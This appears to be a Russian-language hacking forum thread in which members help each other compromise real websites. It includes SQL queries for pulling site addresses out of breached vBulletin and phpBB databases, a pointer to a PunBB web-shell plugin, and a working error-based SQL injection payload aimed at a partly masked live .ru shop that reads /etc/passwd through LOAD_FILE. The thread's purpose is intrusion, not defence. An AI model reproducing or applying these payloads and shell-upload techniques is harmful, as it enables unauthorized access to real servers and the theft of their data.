Старый 09.10.2011, 21:47   #1411
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Как из бд VBulletin'a достать адрес ресурса(форума)? А то есть скуля, таблицы булки в бд, но форума и п близости нету =\
dumb вне форума   Ответить с цитированием
Старый 09.10.2011, 22:15   #1412
Svet
 
Аватар для Svet
 
Регистрация: 11.09.2010
Сообщений: 172
Репутация: 42
По умолчанию

dumb,
Таблица setting. Строка с varname = attachpath. (не url, но тоже достаточно)

для 3.8
Svet вне форума   Ответить с цитированием
Старый 10.10.2011, 01:23   #1413
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

select value from setting where varname = 'cookiedomain'
select value from setting where varname = 'bburl'
select value from setting where varname = 'homeurl'
vp$ вне форума   Ответить с цитированием
Старый 10.10.2011, 21:14   #1414
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

А в PunBB (1.3.4) никак не залиться? Или читалки нет?! Какая то там "скромная" админка...
dumb вне форума   Ответить с цитированием
Старый 11.10.2011, 12:44   #1415
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от dumb Посмотреть сообщение
А в PunBB (1.3.4) никак не залиться? Или читалки нет?! Какая то там "скромная" админка...
[pun-include][/pun-include]

http://***.com/downloads.php->http://***.com/download/plugins/AP_PunBB_Shell.zip

А еще гугл помог
https://rdot.org/forum/archive/index.php/t-4.html
__________________
The Sucks Origin Policy

Последний раз редактировалось Twost; 17.05.2013 в 13:17..
d0znpp вне форума   Ответить с цитированием
Старый 12.10.2011, 15:15   #1416
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Как кодировать и раскодировать время mysql, пример: 2145899400
z0mbie вне форума   Ответить с цитированием
Старый 12.10.2011, 16:24   #1417
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Цитата:
[pun-include][/pun-include]

http://***.com/downloads.php->http://***.com/download/plugins/AP_PunBB_Shell.zip
Да, жто я видел - прав на запись нет ту папку.
Цитата:
А еще гугл помог
https://rdot.org/forum/archive/index.php/t-4.html
Это я тоже видел, но не видел ни в одной версии PunBB такой возможности - то бишь локально что-нить загрузить! Не знаю откуда он это взял...

Цитата:
Как из бд VBulletin'a достать адрес ресурса(форума)? А то есть скуля, таблицы булки в бд, но форума и п близости нету =\
...
select value from setting where varname = 'cookiedomain'
select value from setting where varname = 'bburl'
select value from setting where varname = 'homeurl'
А для phpBB2/3 есть похожие решения?

Последний раз редактировалось Twost; 17.05.2013 в 13:19..
dumb вне форума   Ответить с цитированием
Старый 12.10.2011, 16:52   #1418
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
Как кодировать и раскодировать время mysql, пример: 2145899400
date -d @2145899400
select from_unixtime(2145899400);
Цитата:
Сообщение от dumb Посмотреть сообщение
А для phpBB2/3 есть похожие решения?
select config_value from phpbb_config where config_name='server_name';
~d0s~ вне форума   Ответить с цитированием
Старый 12.10.2011, 20:58   #1419
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
Как кодировать и раскодировать время mysql, пример: 2145899400
_http://www.cy-pr.com/time
vp$ вне форума   Ответить с цитированием
Старый 12.10.2011, 23:57   #1420
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

И опять, права root, а читается только /etc/passwd
Цитата:
http://www.***.ru/shopvw/tradein.php?view=628' AND (SELECT 6171 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,107,110,58),(SELECT MID((IFNULL(CAST(LOAD_FILE(CHAR(47,101,116,99,47,1 12,97,115,115,119,100)) AS CHAR),CHAR(32))),1,50)),CHAR(58,109,101,118,58),FL OOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'yNgl'='yNgl
Два пробела в ссылке добавил форум 1=FLOOR 2=112

Вот ошибки подключения:
Цитата:
http://www.***.ru/shopvw/tradein.php?view=597
И ни один из них не читается! Я что то не так делаю?! Просто уже 3ий рут подряд такая картина...

Последний раз редактировалось Twost; 17.05.2013 в 13:20..
dumb вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot